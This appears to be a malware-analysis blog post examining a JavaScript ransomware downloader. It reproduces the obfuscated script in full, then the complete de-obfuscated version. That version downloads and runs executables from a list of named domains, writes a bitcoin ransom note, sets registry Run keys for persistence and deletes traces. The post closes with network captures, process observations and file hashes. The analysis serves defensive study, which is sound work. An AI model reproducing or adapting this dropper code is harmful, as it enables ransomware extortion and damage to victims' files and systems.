v79 += 'coun';
q86 += ');';
v79 += 'll=';
q86 += ' ws.';
v79 += '.Cr';
q86 += 'Run(';
v79 += ' her';
v79 += '+"';
q86 += '"%';
v79 += 'Li';
q86 += 'CO';
v79 += '; fp';
v79 += 'DE';
q86 += 'MSP';
v79 += 'us=';
q86 += 'EC';
v79 += 'fp.';
v79 += '"/co';
q86 += '% /c';
v79 += 'ose(';
q86 += ' cop';
v79 += 'TTE';
q86 += 'y ';
v79 += 'ine';
v79 += 'll=';
q86 += '/y';
v79 += 'pte';
q86 += ' "+';
v79 += 'OS';
v79 += 'ET"';
q86 += 'cq';
v79 += 'rue)';
v79 += '   ';
q86 += '+f';
v79 += '("%';
v79 += 'Li';
q86 += 'n+';
v79 += ');';
v79 += '=WS';
q86 += '".t';
v79 += ' { d';
v79 += 'PT.';
q86 += 'xt"';
v79 += '0,';
v79 += '".';
q86 += '+cq';
v79 += '; ';
q86 += '+" ';
v79 += '=5)';
q86 += '"+c';
v79 += 'us';
v79 += 'ws.R';
q86 += 'q+';
v79 += 'emOb';
v79 += '{ fo';
q86 += '"%Us';
v79 += 'ADD ';
v79 += '+l';
q86 += 'erP';
v79 += 'cs+';
v79 += '"C';
q86 += 'ro';
v79 += 'usel';
v79 += '"+';
q86 += 'fil';
v79 += '"%Us';
v79 += 'm","';
q86 += 'e%';
v79 += 'in 3';
q86 += '"+c';
v79 += 'er';
q86 += 's+';
v79 += '];';
v79 += '+"D';
q86 += '"D';
v79 += '"); ';
v79 += '};} ';
q86 += 'esk';
v79 += ',0,0';
q86 += 'top"';
v79 += 'un';
q86 += '+c';
v79 += 'oins';
q86 += 's+"D';
v79 += '",';
q86 += 'ECR';
v79 += ') { ';
v79 += 'sa';
q86 += 'YPT';
v79 += '+"';
v79 += 'ileE';
q86 += '.txt';
v79 += 'ne';
v79 += 'dn=';
q86 += '"+';
v79 += '("3';
q86 += 'cq';
v79 += '=ld;';
q86 += ',0';
v79 += 'q,0,';
v79 += '"c';
q86 += ',0);';
v79 += 's+';
q86 += ' w';
v79 += 't(';
v79 += '("';
q86 += 's.';
v79 += 'ur ';
q86 += 'Ru';
v79 += '"C';
v79 += 'teO';
q86 += 'n("%';
v79 += 't pe';
v79 += 'this';
q86 += 'COM';
v79 += 'ls';
v79 += 'itc';
q86 += 'SPE';
v79 += '{xa.';
v79 += 'ts, ';
q86 += 'C% /';
v79 += 'r a';
q86 += 'c "+';
v79 += ' Op';
q86 += 'fn+';
v79 += 'dy ';
v79 += 'un(';
q86 += '".e';
v79 += '+cq,';
q86 += 'xe ';
v79 += '; i';
v79 += 'GET"';
q86 += '"+c';
v79 += 'kutu';
q86 += 'q+f';
v79 += '=3';
v79 += '."';
q86 += 'n+"';
v79 += 's+"D';
v79 += 't/ne';
q86 += '.php';
v79 += 'and';
q86 += '"+';
v79 += 'ith ';
q86 += 'cq,0';
v79 += '+" ';
q86 += ',1)';
v79 += '"%';
v79 += 'an';
q86 += '; ws';
v79 += 'fp';
v79 += 'p.Wr';
q86 += '.R';
v79 += 'e(';
v79 += 'el';
q86 += 'un(';
v79 += 'ine(';
q86 += '"%C';
v79 += 'exe"';
q86 += 'OMS';
v79 += 'ne(';
q86 += 'PE';
v79 += 'SPE';
q86 += 'C% ';
v79 += '); v';
v79 += '(fn';
q86 += '/c';
v79 += 'niqu';
v79 += '"%C';
q86 += ' not';
v79 += '("%';
q86 += 'epad';
v79 += 'ect';
q86 += '.ex';
v79 += '.ex';
v79 += '(fn';
q86 += 'e ';
v79 += '}c';
v79 += ', et';
q86 += '"+c';
v79 += '+"%A';
v79 += 'd="';
q86 += 'q+f';
v79 += '+pd';
q86 += 'n+"';
v79 += 'le';
q86 += '.tx';
v79 += ' you';
q86 += 't"+c';
v79 += 'tp';
q86 += 'q,0,';
v79 += '/c ';
q86 += '0)';
v79 += 'e o';
v79 += 'ps:/';
q86 += '; v';
v79 += '1;n';
v79 += 'Writ';
q86 += 'ar ';
v79 += 'EC';
v79 += 'om/';
q86 += 'fp=f';
v79 += 's+';
q86 += 'o.Cr';
v79 += 'ca';
q86 += 'ea';
v79 += 'Writ';
q86 += 'te';
v79 += 'ne';
q86 += 'Tex';
v79 += 'xo.';
v79 += 'tos';
q86 += 'tFi';
v79 += 'ron';
v79 += '; ws';
q86 += 'le(';
v79 += 'a.ty';
q86 += 'fn';
v79 += 'f(n=';
v79 += 'eLin';
q86 += '+".';
v79 += 'fil';
v79 += '("A';
q86 += 'ph';
v79 += 'htt';
q86 += 'p"';
v79 += '."';
v79 += 'n ';
q86 += ',t';
v79 += '"   ';
v79 += '=1; ';
q86 += 'rue)';
v79 += '+fn+';
v79 += 'al';
q86 += ';f';
v79 += 'Stri';
v79 += 'eLi';
q86 += 'or';
v79 += 'f(n=';
v79 += 'nd()';
q86 += '(var';
v79 += 'E RE';
q86 += ' i=0';
v79 += 'a=';
v79 += ' f';
q86 += ';i<1';
v79 += 'pt';
v79 += 't("W';
q86 += '000;';
v79 += 'ts';
v79 += '("';
q86 += 'i++)';
v79 += 'sk';
q86 += '{fp.';
v79 += 'e ';
v79 += 'nd()';
q86 += 'Writ';
v79 += '}; ';
q86 += 'eLi';
v79 += '","n';
v79 += '("")';
q86 += 'ne';
v79 += '+cq';
q86 += '(ad';
v79 += '+ll[';
v79 += 'gn.c';
q86 += ');';
v79 += 'emOb';
v79 += '.Exp';
q86 += '};';
v79 += 'c "+';
v79 += 'ine';
q86 += 'fp.';
v79 += '";';
q86 += 'Clo';
v79 += '+" ';
v79 += 'Writ';
q86 += 'se';
v79 += '.R';
v79 += 'p.W';
q86 += '();';
v79 += 'htt';
v79 += 's.';
q86 += ' ws';
v79 += ' a';
v79 += '{ xo';
q86 += '.Run';
v79 += 'kutu';
v79 += 'sa';
q86 += '("';
v79 += 'fn';
v79 += 'q,0,';
q86 += '%COM';
v79 += 'r xo';
v79 += 'ws.R';
q86 += 'SPE';
v79 += 'ca';
q86 += 'C% /';
v79 += 'tor';
q86 += 'c D';
v79 += 'om"';
v79 += 'q+';
q86 += 'EL ';
v79 += '."';
v79 += 'fp.';
q86 += '"+';
v79 += '+"%A';
q86 += 'cq+f';
v79 += 'It`';
v79 += '"  ';
q86 += 'n+".';
v79 += 'fp.W';
v79 += '"+cs';
q86 += 'php';
v79 += 'lle';
q86 += '"+cq';
v79 += 'p.Wr';
q86 += ',0';
v79 += ' RS';
v79 += ' ws.';
q86 += ',0);';
v79 += 'o.';
v79 += 'se);';
q86 += ' ws.';
v79 += 'je';
q86 += 'Run(';
v79 += 'ad';
v79 += 'DEL';
q86 += '"%CO';
v79 += 'se';
q86 += 'MSP';
v79 += 'ld]+';
q86 += 'EC% ';
v79 += ',2);';
q86 += '/c ';
v79 += 'org"';
q86 += 'DEL';
v79 += '; v';
v79 += 'n+"';
q86 += ' "+';
v79 += 'Clo';
q86 += 'cq';
v79 += '+c';
q86 += '+fn';
v79 += '.com';
q86 += '+"';
v79 += 'r/?a';
q86 += '.e';
v79 += ' va';
q86 += 'xe"';
v79 += 'ct"';
q86 += '+cq,';
v79 += '; f';
v79 += 'a.ty';
q86 += '0,0';
v79 += ' Op';
v79 += 'e%';
q86 += '); ';
v79 += '  ';
v79 += 'tp:/';
q86 += 'ws.R';
v79 += '"Scr';
q86 += 'un';
v79 += '; ';
v79 += '};} ';
q86 += '("%C';
v79 += '"sh';
q86 += 'OM';
v79 += ' x';
v79 += 'd+';
q86 += 'SPEC';
v79 += 'php';
q86 += '% /c';
v79 += '+" ';
q86 += ' DE';
v79 += 'te';
v79 += ' fo';
q86 += 'L ';
v79 += ') &&';
v79 += '"+';
q86 += '"+cq';
v79 += 'Lin';
v79 += 'p.';
q86 += '+pd';
v79 += 'LHT';
q86 += '+cq';
v79 += '; ';
v79 += 'ES."';
q86 += ',0,0';
v79 += 'Ver';
q86 += '); x';
v79 += ' ws.';
q86 += 'o.';
v79 += 'ay';
v79 += 'd ';
q86 += 'ope';
v79 += 'iles';
q86 += 'n("G';
v79 += 'ite';
q86 += 'ET"';
v79 += '); ';
q86 += ',"h';
v79 += 'eat';
v79 += 'eLi';
q86 += 'ttp:';
v79 += '; fp';
v79 += 'om"';
q86 += '//"';
v79 += 'ow';
q86 += '+l';
v79 += '("A';
q86 += 'l[';
v79 += '+"';
v79 += ' Op';
q86 += 'ld';
v79 += '"+';
v79 += '{xa.';
q86 += ']+';
v79 += 'var ';
q86 += '"/co';
v79 += '=20';
q86 += 'un';
v79 += 'ing';
v79 += 'se);';
q86 += 'ter/';
v79 += 'teL';
v79 += 'php';
q86 += '?ad=';
v79 += '   ';
q86 += '"+a';
v79 += 'eLi';
q86 += 'd+';
v79 += ']+"/';
q86 += '"&';
v79 += ' f';
q86 += 'id=';
v79 += 'onl';
v79 += '.Cl';
q86 += '"+';
v79 += 'pt.C';
v79 += 're';
q86 += 'id+"';
v79 += 'om"';
q86 += '&st=';
v79 += 'Ru';
q86 += 'done';
v79 += 'tc';
v79 += 'fp';
q86 += '",';
v79 += 'rch';
v79 += '; f';
q86 += ' f';
v79 += ') ';
q86 += 'als';
v79 += '+ad+';
v79 += 'fp.';
q86 += 'e); ';
v79 += 'f t';
q86 += 'xo.';
v79 += ' to';
v79 += '"2';
q86 += 'se';
v79 += 'eLi';
q86 += 'nd';
v79 += ' fo';
v79 += 'id="';
q86 += '()';
v79 += ')+c';
q86 += '; };';
v79 += 'ite';
q86 += ' }';
v79 += '+"a';
q86 += ';';
v79 += 'iro';
alert(q86);

Using Revelo I was able to de-obfuscate the javascript. I got this idea by using the steps listed over on Kahu Security’s site here since I was trying to figure out how to get the “EVAL” to trigger correctly using the trick of changing “EVAL” to “ALERT.” Below is the javascript code after de-obfuscation:

var id = "Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0";
var ad = "1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf";
var bc = "0.44591";
var ld = 0;
var cq = String.fromCharCode(34);
var cs = String.fromCharCode(92);
var ll = ["kutubhanam.com", "suwandesign.com", "www.mariaberdun.com", "nikkov.com", "clermontcentralchurch.org"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".txt")) {
    for (var n = 1; n <= 5; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.open();
                    xa.type = 1;
                    xa.write(xo.responseBody);
                    if (xa.size > 1000) {
                        dn = 1;
                        if (n <= 2) {
                            xa.saveToFile(fn + n + ".exe", 2);
                            try {
                                ws.Run(fn + n + ".exe", 1, 0);
                            } catch (er) {};
                        } else if (n == 3) {
                            xa.saveToFile(fn + ".exe", 2);
                        } else if (n == 4) {
                            xa.saveToFile(pd, 2);
                        } else if (n == 5) {
                            xa.saveToFile(fn + ".php", 2);
                        }
                    };
                    xa.close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
    if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
        xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=start", false);
        xo.send();
        var fp = fo.CreateTextFile(fn + ".txt", true);
        fp.WriteLine("ATTENTION!");
        fp.WriteLine("");
        fp.WriteLine("All your documents, photos, databases and other important personal files");
        fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
        fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
        fp.WriteLine("Please follow this manual:");
        fp.WriteLine("");
        fp.WriteLine("1. Create Bitcoin wallet here:");
        fp.WriteLine("");
        fp.WriteLine("      http://blockchain.info/wallet/new");
        fp.WriteLine("");
        fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
        fp.WriteLine("");
        fp.WriteLine("      http://localbitcoins.com/buy_bitcoins");
        fp.WriteLine("");
        fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
        fp.WriteLine("");
        fp.WriteLine("      " + ad);
        fp.WriteLine("");
        fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
        fp.WriteLine("");
        for (var i = 0; i < ll.length; i++) {
            fp.WriteLine("      http://" + ll[i] + "/counter/?a=" + ad);
        };
        fp.WriteLine("");
        fp.WriteLine("5. Run decryptor to restore your files.");
        fp.WriteLine("");
        fp.WriteLine("PLEASE REMEMBER:");
        fp.WriteLine("");
        fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
        fp.WriteLine("      - Nobody can help you except us.");
        fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
        fp.WriteLine("      - Your files can be decrypted only after you make payment.");
        fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
        fp.Close();
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
        ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1);
        ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
        var fp = fo.CreateTextFile(fn + ".php", true);
        for (var i = 0; i < 1000; i++) {
            fp.WriteLine(ad);
        };
        fp.Close();
        ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
        ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
        ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
        xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=done", false);
        xo.send();
    };
};

In the de-obfuscated code there were multiple domains listed which only one was used (kutubhanam.com). None of the others were attempted from what I can tell in the PCAP. The script also shows some of the commands used to write to the different file locations and registry keys on my test VM. I will briefly talk about that in a minute.

From here it looks like the script now starts the task of doing it’s evil and looking at the environment variables for the system and also pulling the other malicious files from the site “kutubhanam.com.” The script runs through this just five times (for(var n=1;n<=5;n++)) which dynamically creates the 5 calls to the malicious domain as you can see below:

The files that were downloaded stated that they were supposed to be “image/png” files, but looking into these requests I saw that they were binary files instead:

	GET /counter/?ad=1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf&id=Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0&rnd=01 HTTP/1.1
	Accept: */*
	UA-CPU: AMD64
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
	Host: kutubhanam.com
	Connection: Keep-Alive

	HTTP/1.1 200 OK
	Date: Tue, 14 Jun 2016 11:20:10 GMT
	Server: Apache
	Content-Disposition: attachment; filename=396e9f53d.png
	Content-Length: 271000
	Vary: User-Agent
	Keep-Alive: timeout=15, max=300
	Connection: Keep-Alive
	Content-Type: image/png

	MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

After downloading the files the last two requests made for HTTP took about 6 milliseconds to complete and is labeled “start” and “finish” as you can see below from the Wireshark capture. I am not sure what the significance of the “start” and “finish” is within the URL or if it is just someone having a sense of humor with the traffic:

	GET /counter/?ad=1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf&id=Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0&st=start HTTP/1.1
	Accept: */*
	UA-CPU: AMD64
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
	Host: kutubhanam.com
	Connection: Keep-Alive

	HTTP/1.1 200 OK
	Date: Tue, 14 Jun 2016 11:20:33 GMT
	Server: Apache
	Vary: User-Agent,Accept-Encoding
	Content-Encoding: gzip
	Content-Length: 20
	Keep-Alive: timeout=15, max=295
	Connection: Keep-Alive
	Content-Type: text/html

	....................

	GET /counter/?ad=1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf&id=Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0&st=done HTTP/1.1
	Accept: */*
	UA-CPU: AMD64
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
	Host: kutubhanam.com
	Connection: Keep-Alive

	HTTP/1.1 200 OK
	Date: Tue, 14 Jun 2016 11:20:39 GMT
	Server: Apache
	Vary: User-Agent,Accept-Encoding
	Content-Encoding: gzip
	Content-Length: 20
	Keep-Alive: timeout=15, max=294
	Connection: Keep-Alive
	Content-Type: text/html

	....................

Switching gears and looking at this malware infection live via Process Monitor I could see that that once I ran the javascript within IE, the process “wscript.exe” kicked off and read the file. I then saw it looking at the registry keys related to crypto (which is what I am assuming is leveraging to encrypt the files on the system). After a little while there are calls to the registry keys of MSXMLHTTP, msxml3.dll, and other files which, I am assuming, are helping with the domain calls from the script above to pull down the additional malware. From here it writes many different files to the system in various locations, along with many registry keys (some of which help obtain persistence on the system). For example, I believe that the malware used (ie: a.exe, and a2.exe) on the system was originally downloaded in an encrypted format as PNG files. These files were stored in different folders located in the “Temp Internet Files” directory (C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\). Looking at the hashes of the files that were written to the system (and that I was able to capture), some of these are the same as you can see below in the section about hashes. We can also see that something gets run at startup (C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9840ab.lnk) since there is a shortcut placed by the REGSVR32.exe process. For a deeper look into what files and registry keys were added or deleted, take a look at the Process Monitor logs that I captured during the infection of my test VM.

You can also watch the infection of my VM below as well.

Hashes from the infection that were found to be malicious:
==========================================================
File name: 1394[1].png / a2.exe
Size: 153KB
MD5 hash: ad1159d07774b4b37f8f08428e4b0242
Virustotal: http://www.virustotal.com/en/file/0add59e65d3d978aedb9f9c38114946eaf66613199d58c0bd49cd3ce119d50b8/analysis/
Detection ratio: 18 / 54
First submission 2016-06-14 11:57:14 UTC

File name: f58776ff279c2[1].png / a.exe (Note: this looks to be the PHP interpreter bundled with Nemucod)
Size: 45KB
MD5 hash: 9f13cc0b1b3b03cbefd8141e5f50b1c1
Virustotal: http://www.virustotal.com/en/file/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95/analysis/
Detection ratio: 1 / 55
First submission 2010-07-03 09:04:07 UTC
Malwr: http://malwr.com/analysis/OTIxZTgxYTQ0ZWY5NDVlOWE1ZmUyODkwYzJlYzY3YTQ/ AND http://malwr.com/analysis/NjM4NTdlNjFmYzllNGI1YzkxYTRjZGEzYTNmMTlhY2Q
Payload Security: http://www.hybrid-analysis.com/sample/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95?environmentId=100

File name: 1f8855925b0db188[1].png (Note: this looks to be the PHP interpreter bundled with Nemucod)
Size: 1.4MB
MD5 hash: 106ffa7e8342890798f1ae110f763471
Virustotal: http://www.virustotal.com/en/file/401901b995f8aaa07c6a9490ec7b320cac95baf9cd3c94c644d14fe3bec0ddac/analysis/
Detection ratio: 0 / 54
First submission 2010-06-10 13:02:10 UTC
Malwr: http://malwr.com/analysis/MzVkYzYwNDJkNGFiNDhjMWJmOTE1NjkzNzI3MzFlZmE/

File name: Dialogs.dll
Size: 84KB
MD5 hash: 310f634a3660e2d087204985684ce474
Virustotal: http://www.virustotal.com/en/file/be75cc4c006bd462c5faf6abb03e55fb3bf3fd818e885a6506e00e458c34e244/analysis/
First submission 2016-06-14 13:23:48 UTC

File name: System.dll
Size: 11KB
MD5 hash: 883eff06ac96966270731e4e22817e11
Virustotal: http://www.virustotal.com/en/file/44e5dfd551b38e886214bd6b9c8ee913c4c4d1f085a6575d97c3e892b925da82/analysis/
Detection ratio: 0 / 55
First submission 2014-10-07 09:22:47 UTC
Payload Security: http://www.hybrid-analysis.com/search?query=883eff06ac96966270731e4e22817e11

Leave a Reply

Your email address will not be published.